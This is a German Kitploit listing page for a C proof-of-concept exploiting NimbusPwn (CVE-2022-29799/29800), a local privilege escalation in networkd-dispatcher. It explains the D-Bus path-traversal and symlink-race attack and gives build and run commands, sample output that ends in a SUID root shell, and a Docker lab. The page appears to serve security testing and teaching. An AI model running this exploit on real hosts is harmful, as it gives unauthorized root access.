Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
NimbusPWN-CVE-2022-29799-29800 — NimbusPwn (CVE-2022-29799/29800) lokaler Privilegieneskalations-PoC in C. | Kitploit
Tools/GitHubGitHub/joshuavanderpoll/nimbuspwn-cve-2022-29799-29800
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubjoshuavanderpoll/nimbuspwn-cve-2022-29799-29800

NimbusPWN-CVE-2022-29799-29800

NimbusPwn (CVE-2022-29799/29800) lokaler Privilegieneskalations-PoC in C.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
5vor 2 MonatenNoch nicht geprüft

NimbusPwn — networkd-dispatcher < 2.1 Lokale Privilegienausweitung (CVE-2022-29799 / CVE-2022-29800) PoC

C Linux

📜 Beschreibung

Ein C-PoC für NimbusPwn, eine lokale Privilegienausweitung in networkd-dispatcher. Ein unprivilegierter Benutzer beansprucht den D-Bus-Namen org.freedesktop.network1 und sendet einen manipulierten OperationalState. Der Root-Daemon bereinigt ihn nicht (CVE-2022-29799, Pfadüberwindung), und ein Symlink-Race im Skriptverzeichnis (CVE-2022-29800, TOCTOU) führt dazu, dass ein vom Angreifer platziertes Skript als Root ausgeführt wird – was eine SUID-Root-Shell hinterlässt.

Betroffen: networkd-dispatcher < 2.1 (behoben in 2.1). Nur Linux. Benötigt das System-D-Bus und einen beanspruchbaren Namen org.freedesktop.network1.

🛠️ Installation

Erstellen auf Linux (Kali oder der Zielmaschine). Es lässt sich nicht unter macOS/Windows erstellen oder ausführen.

root@kitploit:~
git clone https://github.com/joshuavanderpoll/NimbusPWN-CVE-2022-29799-29800.git
cd NimbusPWN-CVE-2022-29799-29800
sudo apt install -y gcc libc6-dev libdbus-1-dev pkg-config
cc nimbuspwn.c -o nimbuspwn $(pkg-config --cflags --libs dbus-1)

[!NOTE] Andere Distributionen: dnf install gcc dbus-devel pkgconf (Fedora/RHEL) oder pacman -S gcc dbus pkgconf (Arch). Die Kompilierzeile ist dieselbe.

⚙️ Verwendung

Als unprivilegierter Benutzer auf einem verwundbaren Host ausführen.

root@kitploit:~
./nimbuspwn [-c] [-s SHELL]
  -c, --check        nicht-brechender Verwundbarkeitscheck, keine Ausnutzung
  -s, --shell SHELL  Shell zum SUID-Kopieren und Spawnen als Root (Standard /bin/sh)
  -h, --help         Hilfe anzeigen

Zuerst prüfen (sicher, legt nichts an, kein Rennen):

root@kitploit:~
$ ./nimbuspwn --check
[+] owned org.freedesktop.network1
[+] verdict: likely vulnerable (org.freedesktop.network1 is claimable, no privesc tried)

Dann ausnutzen:

root@kitploit:~
$ ./nimbuspwn
[*] shell=/bin/sh drop=/tmp/sh attempts=10
[+] owned org.freedesktop.network1
[@] attempt 1 (/tmp/nimbuspwn_93732)
[+] planted 126 payloads (root-owned /sbin execs) in /tmp/nimbuspwn_93732
[*] OperationalState: ../../../tmp/nimbuspwn_93732/poc
[*] signal sent (serial 3)
[@] symlink swapped, waiting for root exec
[+] root backdoor at /tmp/sh, spawning shell
# id
uid=1000(pwn) gid=1000(pwn) euid=0(root) groups=1000(pwn)

Das Rennen ist nicht deterministisch, daher wird es wiederholt (Standard 10×). Verwenden Sie -s /bin/bash auf Hosts ohne /bin/sh.

🐋 Docker-PoC

Ein in sich geschlossenes verwundbares Labor (Ubuntu 20.04 + verwundbarer networkd-dispatcher 2.0). Kein --privileged oder Host-Netzwerk.

root@kitploit:~
docker compose build
docker compose run --rm nimbuspwn-lab
# inside, as user 'pwn':
./nimbuspwn

Der Dispatcher 2.0 wird in docker/ mitgeliefert, sodass der Build nicht von externen Downloads abhängt. Dispatcher-Log: /var/log/dispatcher.log.

🕵🏼 Referenzen

  • Microsoft: https://www.microsoft.com/en-us/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/
  • Upstream: https://gitlab.com/craftyguy/networkd-dispatcher

📢 Haftungsausschluss

Dieses Werkzeug wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Der Ersteller übernimmt keine Verantwortung für Missbrauch oder durch das Werkzeug verursachte Schäden.

Tool herunterladen